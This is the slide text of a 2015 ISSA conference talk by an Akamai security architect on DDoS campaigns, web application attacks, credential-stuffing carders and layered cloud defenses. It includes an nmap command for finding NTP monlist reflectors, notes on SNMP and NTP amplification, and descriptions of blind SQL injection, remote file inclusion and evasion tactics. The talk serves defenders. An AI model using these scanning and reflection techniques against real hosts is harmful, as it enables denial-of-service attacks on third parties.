SlideShare a Scribd company logo

NTXISSACSC3 - Cyber Warfare: Identifying Attackers Hiding Amongst the Flock by Anthony Lauro

North Texas Chapter of the ISSA
North Texas Chapter of the ISSA

Cyber Warfare: Identifying Attackers Hiding Amongst the Flock

Technology
1 of 73
Download to read offline
@NTXISSA #NTXISSACSC3 Cyber Warfare: Identifying Attackers Hiding Amongst the Flock Anthony Lauro Sr. Enterprise Security Architect Akamai Technologies, Inc October 3rd, 2015
@NTXISSA #NTXISSACSC3 Who am I? (unphilosophically speaking) About me: • Anthony Lauro | CISSP, GWAPT • Sr. Enterprise Security Architect Akamai Technologies, Inc • 16 years Information Security Experience • Advise Akamai clients on Cybersecurity Resilience • Lead Application Security training for Enterprise Security Architecture team @Akamai • Attended CCCC a long, long time ago…
@NTXISSA #NTXISSACSC3 There are no rules of architecture for castles in the clouds. -Gilbert K. Chesterton
@NTXISSA #NTXISSACSC3 There are no rules of architecture for castles in the clouds. -Gilbert K. Chesterton
@NTXISSA #NTXISSACSC3 THREAT LANDSCAPE
@NTXISSA #NTXISSACSC3 Evolving Attack Campaigns 190 Gbps attack against US financial institution Q1 13 Q2 13 Account Checker (eCommerce) Largest DNS reflection attack, 167 Gbps (Financial Services) Operation Ababil QQ3 13 Q4 13 D (R 209 EME Record number of DDoS attacks in Q3 13 17
@NTXISSA #NTXISSACSC3 Top 10 Target Countries for Web Application Attacks Q1 2015
@NTXISSA #NTXISSACSC3 Top 10 Source Countries for Web Application Attacks Q1 2015
@NTXISSA #NTXISSACSC3 Attacks Grow Because Methods Improve • Traditional DDoS attacks used compromised home computers • ‘Cloud’ based DDoS attacks harness the scale of global botnets • Amplification attacks target protocol vulns to amplify size • SNMP (6.3x) • DNS (28x-54x) • CharGEN (358.8x) • NTP (556.9x) Gbps Mpps 2014e 2013 20122011 2010 2009 2008 20072006 2005 11 2 18 8 22 11 39 15 48 29 68 38 79 45 82 69 144 320 270 160
@NTXISSA #NTXISSACSC3 You Don’t Have to Be Elite Anymore: “You can do it, we can help”!
@NTXISSA #NTXISSACSC3 Infrastructure Attacks: Smoke Screen? 27% 24% 8% 4% 30% 5%
@NTXISSA #NTXISSACSC3 WHAT MOTIVATES THE THREAT ACTOR? Hacked Web Server
@NTXISSA #NTXISSACSC3 Are You Prepared?
@NTXISSA #NTXISSACSC3 There Are No Immunities Between Verticals Source: www.informationisbeautiful.net/
@NTXISSA #NTXISSACSC3 2014 Attack Trends • Top three attack vectors are application layer attacks • Defacement leads as the top attack, followed by SQLi and Account Hijacking as the most prevalent attacks seen in 2014 Source: Stateoftheinternet.com
@NTXISSA #NTXISSACSC3 Login Abuse: Account Checker Attacks The fuel for any account checker is a list of credentials. Fortunately for attackers, there are a huge number of credentials that are public. • 38,000,000 Adobe accounts • 318,000 Facebook accounts • 70,000 Google accounts • 60,000 Yahoo accounts • 22,000 Twitter accounts • 8,000 ADP accounts • 8,000 LinkedIn accounts
@NTXISSA #NTXISSACSC3 DEFENSEIVE Techniques
@NTXISSA #NTXISSACSC3 A Castle Built in 1385 Defense against French: 100yr War
@NTXISSA #NTXISSACSC3 • Acts as a gateway • Defensive resources become limited • Entry and Exits cannot coexist
@NTXISSA #NTXISSACSC3 WEB SECURITY Common Approaches
@NTXISSA #NTXISSACSC3 Common Approaches to Web Security Build It Buy BoxesDeny the problem
@NTXISSA #NTXISSACSC3 DO NOTHING
@NTXISSA #NTXISSACSC3 Approaches for Web Security On-Premise Hardware Router Firewall Load balancer Bandwidth Application Protection Cloud Service Cloud Platform ISPs Internet Service Providers
@NTXISSA #NTXISSACSC3 On-Premises Web Security Approach On-Premise Hardware Router Firewall Load balancer Bandwidth Bandwidth Constraint Connection & Processing Limitations Application Vulnerability Exploitation “Have to ingest ALL traffic before a Yes/No decision can be made” Performance Degradation Throughput of devices cannot meet volume / requests per second of good and bad traffic spikes. Reliability WAF configurations are complex often not tuned properly or not in blocking mode. Accuracy
@NTXISSA #NTXISSACSC3 I put the WAF on a SPAN port. I was afraid of blocking legitimate traffic! How did this breach occur, we have a WAF!!
@NTXISSA #NTXISSACSC3 Internet Service Provider Approach ISPs Internet Service Providers DDoS Only Protection False Positives/ Upstream Blacklisting Single-Homed Protection Carrier Dependent Architecture Capacity Issues At Scale
@NTXISSA #NTXISSACSC3 Those are birds… Right? I forgot my shield!
@NTXISSA #NTXISSACSC3 Application Protection Cloud Service Approach Application Protection Cloud Service Cloud Platform Direct-to-Origin DDoS Protection Gap Shared Infrastructure (Capacity Constraints) Acceptable Use Monitoring Challenge Retaining Real-time Visibility Not Always Enterprise Class Protection
@NTXISSA #NTXISSACSC3 “In other words, careful where you aim that gun, #OpISIS, because it might point back at you as well.” -Mike Masnick TechDirt
@NTXISSA #NTXISSACSC3 MULTI PERIMETER DEFENSE
@NTXISSA #NTXISSACSC3 MULTI PERIMETER DEFENSE
@NTXISSA #NTXISSACSC3 MULTI PERIMETER DEFENSE
@NTXISSA #NTXISSACSC3 For Internet-facing Applications Internet Web Retrieval and integrity of content and data Origin Supporting infrastructure and other applications DNS Finding the application Datacenter User
@NTXISSA #NTXISSACSC3 Multiple Perimeters For Internet-facing Applications Volumetric Protection • Massive resiliency • Thousands of points of presence • Distributed geographically • Rate controls for noisy requestors Attacks Against CNAMEs • Network and application layer filtering capable • Protocol validation/Filtering • SSL decrypt – re-encrypt • Geo Sensing and Filtering Capable • Capacity: Throughput & P/ps Attacks Against Datacenter IP’s • Direct to origin protection using BGP redirection • Multiple globally distributed scrubbing centers • Attack capacity to withstand multiple attacks at once • Good traffic bypass as not to degrade performance
@NTXISSA #NTXISSACSC3 Multiple Perimeters For Internet-facing Applications Application Layer Attacks SSL decryption at scale Risk scoring rule sets Tune accuracy over time Attacks Against DNS Rate Controls - Connection Throttling White Listing Application Inspection DNSSEC Client/Server Locks Anycast Responses Event Visibility Threat intel gathered and validated against global dataset Real-Time event correlation between security policies Ability to identify hosts based on previous malicious behavior Import log feed from ‘cloud’ into internal SIEM for correlation
@NTXISSA #NTXISSACSC3 HOW TO YOU IDENTIFY & CLASSIFY
@NTXISSA #NTXISSACSC3 THERE’S A DIFFERENCE BETWEEN VISIBILITY & INSIGHT
@NTXISSA #NTXISSACSC3 • Use behavioral data to protect your castle •Collect and correlate attack traffic into a large dataset from across the web •Identify bad clients based on past behavior •Define a risk score for malicious clients •Filter malicious client based on risk score CLIENT REPUTATION SCORING
@NTXISSA #NTXISSACSC3 Information Intelligence Raw, unfiltered feed Processes, sorted information Aggregated from virtually every source Aggregated from reliable sources and cross correlated for accuracy May be true, false, misleading, incomplete, relevant or irrelevant Accurate, timely, complete, assessed for relevancy Not actionable Actionable InfoSec teams are swimming in data More raw “information” is not the solution
@NTXISSA #NTXISSACSC3 53 11,008 16,135 21,359 15,071 30,427 69,226 124,625 9/24 9/25 9/26 9/27 9/28 9/29 9/30 10/1 Unique Shellshock payloads Threats Change/Advance Over Time Shellshock disclosed
@NTXISSA #NTXISSACSC3 CASE STUDIES APPLICATION / DDoS ATTACKS
@NTXISSA #NTXISSACSC3 Case Study: 320 Gbps DDoS Attack: Gaming Vertical, APAC Region • Largest attack ever mitigated by Akamai against single customer • Targeted primary website, supporting network infrastructure, and DNS • Multiple attack vectors: • SYN/UDP floods - entire subnet • Volumetric attack against DNS • Attack characteristics: • 320 Gbps and 71.5 Mpps peak traffic • 2.1 million requests/s against DNS
@NTXISSA #NTXISSACSC3 138 232 321 155 177 312 4 198 217 30 8 35 33 70 3 2 1.5 One Attack in a Broader DDoS Attack Campaign Start End Infrastructure (Gbps) authDNS (Mpps) DNS Reflection (Mpps)Web (Gbps) 21 + Day campaign against single customer • 39 distinct attacks targeting applications and DNS infrastructure • Eight attacks >100 Gbps including record 320 Gbps attack
@NTXISSA #NTXISSACSC3 Grow revenue opportunities with fast, personalized web experiences and manage complexity from peak demand, mobile devices and data collection. Opening Ceremony 1st day of sports • 132 BILLION requests processed by our WAFs • 10x more than 2010 Winter Olympics • WAF rules triggered • 127x more than 2010 Winter Olympics • Custom Rules Triggered: 166,000,000 • Rate Controls (Adaptive Rules) Triggered: 5,600,000 • Requests Denied: 182,200,000
@NTXISSA #NTXISSACSC3 Grow revenue opportunities with fast, personalized web experiences and manage complexity from peak demand, mobile devices and data collection. 0 100 200 300 400 500 Attack traffic… 0 50000 100000 150000 200000 250000 300000 Spain to Netherlands 0 100 200 300 400 500 600 -500 500 1500 2500 3500 4500 Chile to… Australia… 0 2000 4000 6000 8000 10000 12000 14000 16000 Ivory Coast to Japan 3-1 1-5 1-2 3-1 Opening ceremony
@NTXISSA #NTXISSACSC3 Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. Web Application Attacks by Industry – Q1 2015
@NTXISSA #NTXISSACSC3 • Reflection attack • Mostly SNMP v2c devices (~3+ years old) with default “public” community string • Routers, printers, cable modems, NAS • New tool automates sending getBulkRequest to open SNMP servers. • Flood of SNMP GetResponse data sent from reflectors to victim on port 80 • SNMP query begins at highest (OID) tree level to obtain largest possible response The Attack du jour?
@NTXISSA #NTXISSACSC3
@NTXISSA #NTXISSACSC3 Avoid data theft and downtime by extending the security perimeter outside the data-center and protect from increasing frequency, scale and sophistication of web attacks. Case Study: NTP Attacks on Origin 500X RETURN RATE INTRAFFIC >100GBPS ATTACK TRAFFIC AGAINST ORIGIN 1,000+ INCREASE INHITS PER SECOND AGAINST ORIGIN AttackVector Requestwith spoofedsourceIP of target serversentto a vulnerableNTP serverthat allowsthemonlistfunction. NTP serverrepliesbackto the targetIP, direct to origin,at massivescale.
@NTXISSA #NTXISSACSC3 Use nmap NSE Script: identify vulnerable hosts Example: nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target> • The monitor list in response to the monlist command is limited to 600 associations. • The monitor capability may not be enabled on the target in which case you may receive an error number 4 (No Data Available). • There may be a restriction on who can perform Mode 7 commands (e.g. "restrict noquery" in ntp.conf) in which case you may not receive a reply. • This script does not handle authenticating and targets expecting auth info may respond with error number 3 (Format Error).
@NTXISSA #NTXISSACSC3 SSDP aka uPnP (Universal Plug and Pray) SSDP 200-OK Response
@NTXISSA #NTXISSACSC3 DNS Attack Targeting Akamai Customer • DNS requests peaked at 168k per second. • 19B hits in 5 days. Normally serve ~30M hits per week.
@NTXISSA #NTXISSACSC3 DNS Hijacks Attacks: Common Tactic for Middle Eastern Attackers • Client DNS Locks • clientUpdateProhibited • clientTransferProhibited • clientDeleteProhibited • Registrar locks • serverUpdateProhibited • serverTransferProhibited • serverDeleteProhibited US DoD’s DNS Hijacked Best Practice DNS Locks
@NTXISSA #NTXISSACSC3 RFI Attempt to pull click.php file from remote location Using RFI vuln in TimThumb Plugin Remote File Inclusion
@NTXISSA #NTXISSACSC3 Here’s what click.php is really about! HTTP(s) Redirections can fluctuate between 14-20 different pay4click companies and advertiser’s and that means precious bitcoin revenue for the attacker and his friends. http://www.secureworks.com/cyber-threat-intelligence/threats/ppc-hijack/
@NTXISSA #NTXISSACSC3 When good things go bad: Rogue Reseller to Competitor “After years of this relationship we recently found that they now have a copycat site and are selling our products that they are now manufacturing on their own.” – Enterprise Manufacturing Customer “At first they were just scraping our site and we saw it to be mutually beneficial…”
@NTXISSA #NTXISSACSC3 Blind SQL Injection: Time Based Attack This type of blind SQL injection relies on the database pausing for a specified amount of time and examining the results. Using this method, an attacker enumerates each letter of the desired piece of data. Client Request
@NTXISSA #NTXISSACSC3 SQL Injection Analysis 2000 customers over one week SQL Injection Attacks % HTTP 8,137,681 96.6 HTTPS 287,808 3.4 Total 8,425,489 100 Protocol Breakdown Breakdown by Intent Source: Akamai CSI
@NTXISSA #NTXISSACSC3 CMD INJECTION
@NTXISSA #NTXISSACSC3 Remote File Inclusion Attack Request Client Info
@NTXISSA #NTXISSACSC3 “Credentials” Cookie Value Exposure
@NTXISSA #NTXISSACSC3 ACCOUNT CHECKERS: CARDERS Several techniques are used to avoid detection and mitigation, including: ● Randomization of UserAgent header ● Targeting of alternative (mobile/API/legacy) login pages, which may have weaker mitigation controls and are often overlooked by the customer. ● Attacks originate from highly distributed set of IP addresses, with different source countries. ● Use of low request rates to evade rate controls. ● Change in order of headers. ● Changes in tactics when 403 responses are received.
@NTXISSA #NTXISSACSC3 Fraud – Vietnamese Carders Carder TTP • Build Tools Server • Cultivate List of Open Proxies • Acquire Compromised Logins • Check/Alter Compromised Accounts • Make Fraudulent Purchases • Cash out/Resell gift cards
@NTXISSA #NTXISSACSC3 Login Abuse: THE STRUGGLE IS REAL You know who you are!
@NTXISSA #NTXISSACSC3 Login Abuses: TTPs and Defenses Rate controls to block fast moving scripts • Attack relies on being able to check thousands of accounts quickly • Blocking aggressive scripts prevents login exploitation Internal monitoring for changes to customer accounts • Email address • Shipping address • Same email on multiple accounts Geo blocklists for areas where there is no business • Cuts down on the places attackers can launch from • Do cloud server providers need to access your webpage? Custom rules to block User-Agent strings (or lack thereof) • Attack scripts are often simple and will contain only “curl” or “wget” • Sometimes none at all
@NTXISSA #NTXISSACSC3
@NTXISSA #NTXISSACSC3
@NTXISSA #NTXISSACSC3 DD4BC: (DDoS for Bitcoin) • Industries affected • Payment Processing • Banking & Credit Unions • Gambling • Oil & Gas • E-Commerce • High Tech Consulting/Services • Attack Types • Boot Stressor sites most likely culprit • Reflection Attacks
@NTXISSA #NTXISSACSC3 Looking Forward into 2015 • Industry Verticals • Gaming, Fiserv, Internet & Telecom, Software & Tech, and Media verticals expected to be targeted heavily in 2015 • Security vulnerabilities continue to increase due to bespoke/custom applications • Good history of successful attacks • DDoS Attacks • Expect more ‘mega’ attacks > 100Gbps • Commoditization of DDOS attacks • IPv6 uptake to increase DDoS vector • Never pay ransoms, but do have a plan • APPLICATION ATTACK TRENDS • APPSEC IS FAILING – NEED HELP! • IF YOU DON’T HAVE AN APPSEC PROGRAM START ONE! • INJECTION & XSS RIDE OWASP TOP 10 • SESSIONS MGMT – YOURE DOING IT WRONG • DEVELOPERS – YOU’RE BEHIND!
@NTXISSA #NTXISSACSC3 1. You Need ’Validated’ Data To derive intelligence on current & evolving threats. 2. Scale, Availability & Resilience To be high performing, take the punches, & stay online. 3. A Plan To understand how to respond to bad day scenarios. 4. Control & Flexibility To adapt your defenses dynamically. Cyber Security Requirements: 5 Points To Take Away 5. People & Experience To execute every time you come under attack.
@NTXISSA #NTXISSACSC3 RESOURCES OWASP: OPEN WEB APPLICATION SECURITY PROJECT https://www.owasp.org/index.php/Main_Page BSIMM5: BUILDING SECURITY IN MATURITY MODEL v5 https://www.bsimm.com/ SANS SWAT: SECURING WEB APPLICATION TECHNOLOGIES v1.1 http://software-security.sans.org/resources/swat CERT: SECURE CODING STANDARDS http://www.cert.org/secure-coding/research/secure-coding-standards.cfm? AKAMAI TECHNOLOGIES (HEY, WHY NOT) https://www.akamai.com/us/en/cloud-security.jsp
@NTXISSA #NTXISSACSC3 Tony Lauro | CISSP, GWAPT Senior Enterprise Security Architect @tonylauro
@NTXISSA #NTXISSACSC3@NTXISSA #NTXISSACSC3 The Collin College Engineering Department Collin College Student Chapter of the North Texas ISSA North Texas ISSA (Information Systems Security Association) NTX ISSA Cyber Security Conference – October 2-3, 2015 73 Thank you

Recommended

Ntxissacsc5 yellow 7 protecting the cloud with cep
Ntxissacsc5 yellow 7 protecting the cloud with cepNtxissacsc5 yellow 7 protecting the cloud with cep
Ntxissacsc5 yellow 7 protecting the cloud with cep
North Texas Chapter of the ISSA
 
NTXISSACSC4 - Ransomware: History Analysis & Mitigation
NTXISSACSC4 - Ransomware: History Analysis & MitigationNTXISSACSC4 - Ransomware: History Analysis & Mitigation
NTXISSACSC4 - Ransomware: History Analysis & Mitigation
North Texas Chapter of the ISSA
 
Purple seven-ntxissacsc5 walcutt
Purple seven-ntxissacsc5 walcuttPurple seven-ntxissacsc5 walcutt
Purple seven-ntxissacsc5 walcutt
North Texas Chapter of the ISSA
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower Costs
OpenDNS
 
NTXISSACSC4 - A Brief History of Cryptographic Failures
NTXISSACSC4 - A Brief History of Cryptographic FailuresNTXISSACSC4 - A Brief History of Cryptographic Failures
NTXISSACSC4 - A Brief History of Cryptographic Failures
North Texas Chapter of the ISSA
 
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't EnoughNTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
North Texas Chapter of the ISSA
 
Combating Cyberattacks through Network Agility and Automation
Combating Cyberattacks through Network Agility and AutomationCombating Cyberattacks through Network Agility and Automation
Combating Cyberattacks through Network Agility and Automation
Sagi Brody
 
Cloud Security 101 (Webinar Deck)
Cloud Security 101 (Webinar Deck)Cloud Security 101 (Webinar Deck)
Cloud Security 101 (Webinar Deck)
Panther Labs
 

Recommended

Ntxissacsc5 yellow 7 protecting the cloud with cep
Ntxissacsc5 yellow 7 protecting the cloud with cepNtxissacsc5 yellow 7 protecting the cloud with cep
Ntxissacsc5 yellow 7 protecting the cloud with cep
North Texas Chapter of the ISSA
 
NTXISSACSC4 - Ransomware: History Analysis & Mitigation
NTXISSACSC4 - Ransomware: History Analysis & MitigationNTXISSACSC4 - Ransomware: History Analysis & Mitigation
NTXISSACSC4 - Ransomware: History Analysis & Mitigation
North Texas Chapter of the ISSA
 
Purple seven-ntxissacsc5 walcutt
Purple seven-ntxissacsc5 walcuttPurple seven-ntxissacsc5 walcutt
Purple seven-ntxissacsc5 walcutt
North Texas Chapter of the ISSA
 
Standardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower CostsStandardizing and Strengthening Security to Lower Costs
Standardizing and Strengthening Security to Lower Costs
OpenDNS
 
NTXISSACSC4 - A Brief History of Cryptographic Failures
NTXISSACSC4 - A Brief History of Cryptographic FailuresNTXISSACSC4 - A Brief History of Cryptographic Failures
NTXISSACSC4 - A Brief History of Cryptographic Failures
North Texas Chapter of the ISSA
 
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't EnoughNTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
NTXISSACSC4 - Artifacts Are for Archaeologists: Why Hunting Malware Isn't Enough
North Texas Chapter of the ISSA
 
Combating Cyberattacks through Network Agility and Automation
Combating Cyberattacks through Network Agility and AutomationCombating Cyberattacks through Network Agility and Automation
Combating Cyberattacks through Network Agility and Automation
Sagi Brody
 
Cloud Security 101 (Webinar Deck)
Cloud Security 101 (Webinar Deck)Cloud Security 101 (Webinar Deck)
Cloud Security 101 (Webinar Deck)
Panther Labs
 
Panther 101: Bootstrapping Your Cloud SIEM (Webinar Deck)
Panther 101: Bootstrapping Your Cloud SIEM (Webinar Deck)Panther 101: Bootstrapping Your Cloud SIEM (Webinar Deck)
Panther 101: Bootstrapping Your Cloud SIEM (Webinar Deck)
Panther Labs
 
Umbrella for MSPs: Enterprise Grade Malware Protection & Containment
Umbrella for MSPs: Enterprise Grade Malware Protection & ContainmentUmbrella for MSPs: Enterprise Grade Malware Protection & Containment
Umbrella for MSPs: Enterprise Grade Malware Protection & Containment
OpenDNS
 
Threat Hunting at Scale
Threat Hunting at ScaleThreat Hunting at Scale
Threat Hunting at Scale
Panther Labs
 
Taking Action on Your Security Alerts with Panther and Tines
Taking Action on Your Security Alerts with Panther and Tines Taking Action on Your Security Alerts with Panther and Tines
Taking Action on Your Security Alerts with Panther and Tines
Panther Labs
 
Intelligence-Led Security: Powering the Future of Cyber Defense
Intelligence-Led Security: Powering the Future of Cyber DefenseIntelligence-Led Security: Powering the Future of Cyber Defense
Intelligence-Led Security: Powering the Future of Cyber Defense
Priyanka Aash
 
Insights from-NSAs-cybersecurity-threat-operations-center
Insights from-NSAs-cybersecurity-threat-operations-centerInsights from-NSAs-cybersecurity-threat-operations-center
Insights from-NSAs-cybersecurity-threat-operations-center
Priyanka Aash
 
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
kieranjacobsen
 
Null hyderabad - October Newsbytes
Null hyderabad - October NewsbytesNull hyderabad - October Newsbytes
Null hyderabad - October Newsbytes
n|u - The Open Security Community
 
"Giving the bad guys no sleep"
"Giving the bad guys no sleep""Giving the bad guys no sleep"
"Giving the bad guys no sleep"
Christiaan Beek
 
Arbor Presentation
Arbor Presentation Arbor Presentation
Arbor Presentation
J Hartig
 
e-Extortion Trends and Defense
e-Extortion Trends and Defensee-Extortion Trends and Defense
e-Extortion Trends and Defense
Erik Iker
 
Offensive malware usage and defense
Offensive malware usage and defenseOffensive malware usage and defense
Offensive malware usage and defense
Christiaan Beek
 
Soc 2030-socs-are-broken-lets-fix- them
Soc 2030-socs-are-broken-lets-fix- themSoc 2030-socs-are-broken-lets-fix- them
Soc 2030-socs-are-broken-lets-fix- them
Priyanka Aash
 
A Brief History of Cryptographic Failures
A Brief History of Cryptographic FailuresA Brief History of Cryptographic Failures
A Brief History of Cryptographic Failures
Nothing Nowhere
 
DNS Security, is it enough?
DNS Security, is it enough? DNS Security, is it enough?
DNS Security, is it enough?
Zscaler
 
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowiczNtxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
North Texas Chapter of the ISSA
 
Shamoon
ShamoonShamoon
Shamoon
Shakacon
 
An Evolving Era of Botnet Empires @ BSides Las Vegas
An Evolving Era of Botnet Empires @ BSides Las VegasAn Evolving Era of Botnet Empires @ BSides Las Vegas
An Evolving Era of Botnet Empires @ BSides Las Vegas
Andrea Scarfo
 
From Strategy To Tactics - Targeting And Protecting Privileged Accounts
From Strategy To Tactics - Targeting And Protecting Privileged AccountsFrom Strategy To Tactics - Targeting And Protecting Privileged Accounts
From Strategy To Tactics - Targeting And Protecting Privileged Accounts
Lavi Lazarovitz
 
CSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri DiogenesCSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri Diogenes
NCCOMMS
 
Is Cyber-offence the New Cyber-defence?
Is Cyber-offence the New Cyber-defence?Is Cyber-offence the New Cyber-defence?
Is Cyber-offence the New Cyber-defence?
Jim Geovedi
 
Cyber Warfare vs. Hacking (in English)
Cyber Warfare vs. Hacking (in English)Cyber Warfare vs. Hacking (in English)
Cyber Warfare vs. Hacking (in English)
Digicomp Academy AG
 

More Related Content

What's hot

What's hot (20)

Panther 101: Bootstrapping Your Cloud SIEM (Webinar Deck)
Panther 101: Bootstrapping Your Cloud SIEM (Webinar Deck)Panther 101: Bootstrapping Your Cloud SIEM (Webinar Deck)
Panther 101: Bootstrapping Your Cloud SIEM (Webinar Deck)
 
Umbrella for MSPs: Enterprise Grade Malware Protection & Containment
Umbrella for MSPs: Enterprise Grade Malware Protection & ContainmentUmbrella for MSPs: Enterprise Grade Malware Protection & Containment
Umbrella for MSPs: Enterprise Grade Malware Protection & Containment
 
Threat Hunting at Scale
Threat Hunting at ScaleThreat Hunting at Scale
Threat Hunting at Scale
 
Taking Action on Your Security Alerts with Panther and Tines
Taking Action on Your Security Alerts with Panther and Tines Taking Action on Your Security Alerts with Panther and Tines
Taking Action on Your Security Alerts with Panther and Tines
 
Intelligence-Led Security: Powering the Future of Cyber Defense
Intelligence-Led Security: Powering the Future of Cyber DefenseIntelligence-Led Security: Powering the Future of Cyber Defense
Intelligence-Led Security: Powering the Future of Cyber Defense
 
Insights from-NSAs-cybersecurity-threat-operations-center
Insights from-NSAs-cybersecurity-threat-operations-centerInsights from-NSAs-cybersecurity-threat-operations-center
Insights from-NSAs-cybersecurity-threat-operations-center
 
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
 
Null hyderabad - October Newsbytes
Null hyderabad - October NewsbytesNull hyderabad - October Newsbytes
Null hyderabad - October Newsbytes
 
"Giving the bad guys no sleep"
"Giving the bad guys no sleep""Giving the bad guys no sleep"
"Giving the bad guys no sleep"
 
Arbor Presentation
Arbor Presentation Arbor Presentation
Arbor Presentation
 
e-Extortion Trends and Defense
e-Extortion Trends and Defensee-Extortion Trends and Defense
e-Extortion Trends and Defense
 
Offensive malware usage and defense
Offensive malware usage and defenseOffensive malware usage and defense
Offensive malware usage and defense
 
Soc 2030-socs-are-broken-lets-fix- them
Soc 2030-socs-are-broken-lets-fix- themSoc 2030-socs-are-broken-lets-fix- them
Soc 2030-socs-are-broken-lets-fix- them
 
A Brief History of Cryptographic Failures
A Brief History of Cryptographic FailuresA Brief History of Cryptographic Failures
A Brief History of Cryptographic Failures
 
DNS Security, is it enough?
DNS Security, is it enough? DNS Security, is it enough?
DNS Security, is it enough?
 
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowiczNtxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
Ntxissacsc5 gold 1--mimecast email resiliency- erez-haimowicz
 
Shamoon
ShamoonShamoon
Shamoon
 
An Evolving Era of Botnet Empires @ BSides Las Vegas
An Evolving Era of Botnet Empires @ BSides Las VegasAn Evolving Era of Botnet Empires @ BSides Las Vegas
An Evolving Era of Botnet Empires @ BSides Las Vegas
 
From Strategy To Tactics - Targeting And Protecting Privileged Accounts
From Strategy To Tactics - Targeting And Protecting Privileged AccountsFrom Strategy To Tactics - Targeting And Protecting Privileged Accounts
From Strategy To Tactics - Targeting And Protecting Privileged Accounts
 
CSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri DiogenesCSF18 - Incident Response in the Cloud - Yuri Diogenes
CSF18 - Incident Response in the Cloud - Yuri Diogenes
 

Viewers also liked

04-1 E-commerce Security slides
04-1 E-commerce Security slides04-1 E-commerce Security slides
04-1 E-commerce Security slides
monchai sopitka
 
Building a Next-Generation Security Operation Center Based on IBM QRadar and ...
Building a Next-Generation Security Operation Center Based on IBM QRadar and ...Building a Next-Generation Security Operation Center Based on IBM QRadar and ...
Building a Next-Generation Security Operation Center Based on IBM QRadar and ...
IBM Security
 
Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats
IBM Security
 
Cybercrime.ppt
Cybercrime.pptCybercrime.ppt
Cybercrime.ppt
Aeman Khan
 
Cyber crime and security ppt
Cyber crime and security pptCyber crime and security ppt
Cyber crime and security ppt
Lipsita Behera
 

Viewers also liked (13)

Is Cyber-offence the New Cyber-defence?
Is Cyber-offence the New Cyber-defence?Is Cyber-offence the New Cyber-defence?
Is Cyber-offence the New Cyber-defence?
 
Cyber Warfare vs. Hacking (in English)
Cyber Warfare vs. Hacking (in English)Cyber Warfare vs. Hacking (in English)
Cyber Warfare vs. Hacking (in English)
 
Top 6 Sources for Identifying Threat Actor TTPs
Top 6 Sources for Identifying Threat Actor TTPsTop 6 Sources for Identifying Threat Actor TTPs
Top 6 Sources for Identifying Threat Actor TTPs
 
An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)An introduction to SOC (Security Operation Center)
An introduction to SOC (Security Operation Center)
 
04-1 E-commerce Security slides
04-1 E-commerce Security slides04-1 E-commerce Security slides
04-1 E-commerce Security slides
 
Close the Loop on Incident Response
Close the Loop on Incident ResponseClose the Loop on Incident Response
Close the Loop on Incident Response
 
Building a Next-Generation Security Operation Center Based on IBM QRadar and ...
Building a Next-Generation Security Operation Center Based on IBM QRadar and ...Building a Next-Generation Security Operation Center Based on IBM QRadar and ...
Building a Next-Generation Security Operation Center Based on IBM QRadar and ...
 
Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats Orchestrate Your Security Defenses; Protect Against Insider Threats
Orchestrate Your Security Defenses; Protect Against Insider Threats
 
Ponemon Institute Reviews Key Findings from “2017 State of Mobile & IoT Appli...
Ponemon Institute Reviews Key Findings from “2017 State of Mobile & IoT Appli...Ponemon Institute Reviews Key Findings from “2017 State of Mobile & IoT Appli...
Ponemon Institute Reviews Key Findings from “2017 State of Mobile & IoT Appli...
 
Cyber security
Cyber securityCyber security
Cyber security
 
Threat Intelligence by the Numbers
Threat Intelligence by the NumbersThreat Intelligence by the Numbers
Threat Intelligence by the Numbers
 
Cybercrime.ppt
Cybercrime.pptCybercrime.ppt
Cybercrime.ppt
 
Cyber crime and security ppt
Cyber crime and security pptCyber crime and security ppt
Cyber crime and security ppt
 

Similar to NTXISSACSC3 - Cyber Warfare: Identifying Attackers Hiding Amongst the Flock by Anthony Lauro

The 3 Models in the NGINX Microservices Reference Architecture
The 3 Models in the NGINX Microservices Reference ArchitectureThe 3 Models in the NGINX Microservices Reference Architecture
The 3 Models in the NGINX Microservices Reference Architecture
NGINX, Inc.
 
Microsegmentation from strategy to execution
Microsegmentation from strategy to executionMicrosegmentation from strategy to execution
Microsegmentation from strategy to execution
AlgoSec
 
